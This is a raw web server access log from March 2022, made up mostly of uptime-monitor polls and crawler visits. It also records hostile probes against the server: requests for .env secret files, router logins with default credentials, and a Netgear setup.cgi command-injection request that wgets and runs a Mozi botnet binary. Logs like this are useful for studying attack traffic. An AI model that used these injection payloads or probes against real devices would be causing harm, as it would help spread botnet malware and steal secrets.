212.91.246.72 - - [02/Mar/2022:09:59:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:10:00:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.232.43.33 - - [02/Mar/2022:10:00:31 +0100] "\x03" 501 316 "-" "-"
94.232.43.33 - - [02/Mar/2022:10:00:31 +0100] "\x03" 501 316 "-" "-"
37.120.142.22 - - [02/Mar/2022:10:01:14 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
37.120.142.22 - - [02/Mar/2022:10:01:14 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
37.120.142.22 - - [02/Mar/2022:10:01:14 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
212.91.246.72 - - [02/Mar/2022:10:01:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:10:02:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:10:03:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:10:04:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
120.85.43.92 - - [02/Mar/2022:10:04:37 +0100] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 310 "-" "-"
212.91.246.72 - - [02/Mar/2022:10:05:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
157.245.70.127 - - [02/Mar/2022:10:06:05 +0100] "GET /ab2g HTTP/1.1" 400 329 "-" "-"
157.245.70.127 - - [02/Mar/2022:10:06:05 +0100] "GET /ab2h HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Mar/2022:10:06:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.118.53.210 - - [02/Mar/2022:10:06:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [02/Mar/2022:10:07:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:10:08:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:10:09:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:10:10:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:10:11:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:10:12:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:10:13:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.192.241.99 - - [02/Mar/2022:10:13:32 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [02/Mar/2022:10:14:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:10:15:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
201.150.177.69 - - [02/Mar/2022:10:15:20 +0100] "GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0" 404 324 "-" "-"
212.91.246.72 - - [02/Mar/2022:10:16:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:10:17:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:10:18:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:10:19:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
75.119.145.87 - - [02/Mar/2022:10:19:38 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [02/Mar/2022:10:20:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:10:21:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
109.237.103.118 - - [02/Mar/2022:10:21:40 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
109.237.103.118 - - [02/Mar/2022:10:21:40 +0100] "\x16\x03\x01\x01D\x01" 501 321 "-" "-"
212.91.246.72 - - [02/Mar/2022:10:22:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:10:23:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:10:24:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
109.92.143.90 - - [02/Mar/2022:10:25:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [02/Mar/2022:10:25:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:10:26:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
23.95.100.141 - - [02/Mar/2022:10:26:44 +0100] "HEAD / HTTP/1.0" 200 - "-" "-"
23.95.100.141 - - [02/Mar/2022:10:26:50 +0100] "HEAD / HTTP/1.0" 200 - "-" "-"
65.108.110.26 - - [02/Mar/2022:10:26:56 +0100] "GET /robots.txt HTTP/1.1" 404 334 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.110.26 - - [02/Mar/2022:10:27:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
23.95.100.141 - - [02/Mar/2022:10:27:11 +0100] "HEAD / HTTP/1.0" 200 - "-" "-"
212.91.246.72 - - [02/Mar/2022:10:27:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
23.95.100.141 - - [02/Mar/2022:10:28:11 +0100] "HEAD / HTTP/1.0" 200 - "-" "-"
212.91.246.72 - - [02/Mar/2022:10:28:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:10:29:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:10:30:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
23.95.100.141 - - [02/Mar/2022:10:30:26 +0100] "HEAD / HTTP/1.0" 200 - "-" "-"
23.95.100.141 - - [02/Mar/2022:10:30:44 +0100] "HEAD / HTTP/1.0" 200 - "-" "-"
212.91.246.72 - - [02/Mar/2022:10:31:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:10:32:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
23.95.100.141 - - [02/Mar/2022:10:32:30 +0100] "HEAD / HTTP/1.0" 200 - "-" "-"
212.91.246.72 - - [02/Mar/2022:10:33:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:10:34:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
75.119.145.87 - - [02/Mar/2022:10:34:59 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
23.95.100.141 - - [02/Mar/2022:10:35:17 +0100] "HEAD / HTTP/1.0" 200 - "-" "-"
212.91.246.72 - - [02/Mar/2022:10:35:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:10:36:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
23.95.100.141 - - [02/Mar/2022:10:36:48 +0100] "HEAD / HTTP/1.0" 200 - "-" "-"
212.91.246.72 - - [02/Mar/2022:10:37:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:10:38:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:10:39:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.195.93.98 - - [02/Mar/2022:10:39:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.27.1"
212.91.246.72 - - [02/Mar/2022:10:40:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
23.95.100.141 - - [02/Mar/2022:10:41:06 +0100] "HEAD / HTTP/1.0" 200 - "-" "-"
212.91.246.72 - - [02/Mar/2022:10:41:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:10:42:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:10:43:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:10:44:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:10:45:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:10:46:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:10:47:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.221.192.26 - - [02/Mar/2022:10:48:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
35.233.62.116 - - [02/Mar/2022:10:48:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.27.1"
212.91.246.72 - - [02/Mar/2022:10:48:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:10:49:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:10:50:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:10:51:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:10:52:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:10:53:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
104.206.128.78 - - [02/Mar/2022:10:54:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "https://gdnplus.com:Gather Analyze Provide."
212.91.246.72 - - [02/Mar/2022:10:54:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
109.237.103.118 - - [02/Mar/2022:10:54:38 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
109.237.103.118 - - [02/Mar/2022:10:54:38 +0100] "\x16\x03\x01\x01D\x01" 501 321 "-" "-"
212.91.246.72 - - [02/Mar/2022:10:55:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.195.93.98 - - [02/Mar/2022:10:55:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.27.1"
35.233.62.116 - - [02/Mar/2022:10:56:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.27.1"
212.91.246.72 - - [02/Mar/2022:10:56:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:10:57:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:10:58:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:10:59:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:00:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:01:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:02:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.195.93.98 - - [02/Mar/2022:11:03:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.27.1"
212.91.246.72 - - [02/Mar/2022:11:03:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.165.16.71 - - [02/Mar/2022:11:04:13 +0100] "\x03" 501 316 "-" "-"
194.165.16.71 - - [02/Mar/2022:11:04:13 +0100] "\x03" 501 316 "-" "-"
212.91.246.72 - - [02/Mar/2022:11:04:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:05:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:06:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:07:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:08:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:09:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:10:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:11:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:12:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:13:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:14:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:15:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:16:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:17:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:18:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:19:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:20:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
157.245.70.127 - - [02/Mar/2022:11:21:11 +0100] "GET /ab2g HTTP/1.1" 400 329 "-" "-"
157.245.70.127 - - [02/Mar/2022:11:21:11 +0100] "GET /ab2h HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Mar/2022:11:21:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:22:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:23:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.118.160.57 - - [02/Mar/2022:11:23:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com"
212.91.246.72 - - [02/Mar/2022:11:24:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:25:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:26:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:27:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
75.119.145.87 - - [02/Mar/2022:11:27:30 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [02/Mar/2022:11:28:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:29:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:30:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:31:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:32:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:33:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:34:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:35:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:36:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:37:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:38:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:39:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:40:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:41:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:42:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.138.120 - - [02/Mar/2022:11:42:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.120 - - [02/Mar/2022:11:42:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.120 - - [02/Mar/2022:11:42:30 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
212.91.246.72 - - [02/Mar/2022:11:43:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:44:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.96.130.3 - - [02/Mar/2022:11:44:28 +0100] "\x16\x03\x01" 501 318 "-" "-"
74.82.47.2 - - [02/Mar/2022:11:44:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Mar/2022:11:45:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.137.23.152 - - [02/Mar/2022:11:45:40 +0100] "GET /dispatch.asp HTTP/1.1" 404 317 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
128.1.248.42 - - [02/Mar/2022:11:45:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
193.118.53.210 - - [02/Mar/2022:11:46:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [02/Mar/2022:11:46:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.203.56.1 - - [02/Mar/2022:11:47:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "HTTP Banner Detection (https://security.ipip.net)"
212.91.246.72 - - [02/Mar/2022:11:47:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:48:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:49:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:50:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.137.23.152 - - [02/Mar/2022:11:50:20 +0100] "GET /dispatch.asp HTTP/1.1" 404 317 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
